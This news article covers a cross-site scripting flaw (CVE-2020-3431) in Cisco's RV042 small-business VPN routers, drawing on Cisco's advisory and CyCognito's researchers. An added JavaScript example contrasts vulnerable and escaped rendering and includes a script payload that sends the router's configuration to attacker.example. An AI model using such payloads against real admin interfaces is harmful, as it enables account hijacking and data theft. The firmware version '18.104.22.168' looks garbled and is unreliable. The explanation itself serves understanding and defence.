Cisco SMB kit harbors cross-site scripting bug: One wrong link click... and that's your router pwned remotely
VPN gear vulnerable to remote hijackings
Cisco has patched a cross-site scripting vulnerability in two VPN routers it sells to small businesses and branch offices.
The software update addresses CVE-2020-3431, a bug present in the Cisco Small Business RV042 Dual WAN VPN Router and Cisco Small Business RV042G Dual Gigabit WAN VPN Router. We're told this flaw can be exploited by "an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device."
In other words, if an administrator is tricked into following a specially crafted link, for instance one sent by email, the attacker's script runs in that administrator's browser within the origin of the router's management interface, so it can make requests to the interface as the logged-in user: reading or changing configuration settings to gain further access or cause mischief. The attack requires that the victim's browser can reach the web-based management interface. By default, remote management is disabled, so the interface is reachable only from the LAN; note that this does not stop the attack against an administrator who is on the LAN, because it is the administrator's own browser, not the attacker, that sends the crafted request.
"A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive browser-based information," Cisco explained in its advisory yesterday.
"The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected software. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link.
"To determine whether the remote management feature is enabled for a device, open the web-based management interface through a local LAN connection and choose Basic Settings > Remote Management. If the 'Enable' check box is checked, remote management is enabled for the device."
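To make the "insufficient validation of user-supplied input" concrete, here is an added example of a reflected cross-site scripting sink next to its hardened form. It is illustrative code written for this article, not the RV042 firmware's code or CyCognito's exploit: the `page` parameter, the `/config` path, the `attacker.example` host and the HTML template are all assumptions. It shows how a value taken from the link's query string lands in the page unescaped, why the resulting script runs in the management interface's origin, and how output encoding closes the hole.

```javascript
// Added example, not Cisco's or CyCognito's code. The parameter name "page",
// the template, the "/config" path and "attacker.example" are assumptions.

// Minimal HTML-escaping helper for text nodes and attribute values.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Parse the query string of a management-interface URL into a plain object.
function parseQuery(url) {
  return Object.fromEntries(new URL(url).searchParams.entries());
}

// Vulnerable render: the "page" parameter is echoed into HTML unescaped.
// This is the kind of sink the advisory calls insufficient input validation.
function renderVulnerable(url) {
  const page = parseQuery(url).page ?? "home";
  return `<html><body><h1>Settings: ${page}</h1></body></html>`;
}

// Hardened render: same template, but the reflected value is HTML-escaped,
// so browser-supplied text can never become markup or script.
function renderHardened(url) {
  const page = parseQuery(url).page ?? "home";
  return `<html><body><h1>Settings: ${escapeHtml(page)}</h1></body></html>`;
}

// Build the kind of link an attacker would send to the administrator.
// Because the script is served from the router's own origin, it runs with
// the administrator's session: same-origin fetches carry the admin's cookies,
// so it can read configuration and post changes as that user.
function craftedLink(base) {
  const payload =
    "<script>fetch('/config').then(r=>r.text()).then(t=>" +
    "fetch('https://attacker.example/?d='+encodeURIComponent(t)))</script>";
  const u = new URL(base);
  u.searchParams.set("page", payload); // percent-encoded in the URL, decoded by the server
  return u.toString();
}

// Coarse check: does the rendered page contain an executable script tag?
function containsScript(html) {
  return /<script[\s>]/i.test(html);
}

// Demo against a constructed LAN address (not a real device).
const demoLink = craftedLink("http://192.168.1.1/settings.htm");
console.log("vulnerable page executes script:", containsScript(renderVulnerable(demoLink)));
console.log("hardened page executes script:  ", containsScript(renderHardened(demoLink)));
```

The important property is the origin: the injected script is delivered by the router's own web server, so the browser treats it as part of the management interface and grants it the administrator's session, which is why a single click is enough to act "as you". Escaping at the point where untrusted data enters HTML is the standard fix; whether that is precisely what Cisco changed in its firmware is not stated in the advisory.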
Switchzilla said it squashed the bug in its 18.104.22.168 firmware update for both models.
While Cisco classified CVE-2020-3431 as a "moderate" security risk, infosec outfit CyCognito, which discovered and reported the vulnerability, told The Register on Wednesday that in the worst-case scenario, a miscreant could exploit the flaw to ultimately take complete control of the device before moving laterally.
The attacker could, say, send a network administrator an email containing a link to a page that exploited the XSS bug to hijack the VPN gateway.
"Once he clicks on the link we can run the web page, we can basically control his administrator account, we can get credentials," explained CyCognito head of security research Alex Zaslavsky, who, along with researcher Chen Bremer, was credited with finding the bug. "Web connections can be very powerful, once we get his credentials we can change anything."
While working in the field with a large unnamed customer, CyCognito uncovered the flaw in a router in a branch office, we're told. CyCognito then investigated the issue and, after figuring out the details of the vulnerability, reported it to Cisco for patching. Last night, Cisco said it was "not aware of any public announcements or malicious use of the vulnerability." ®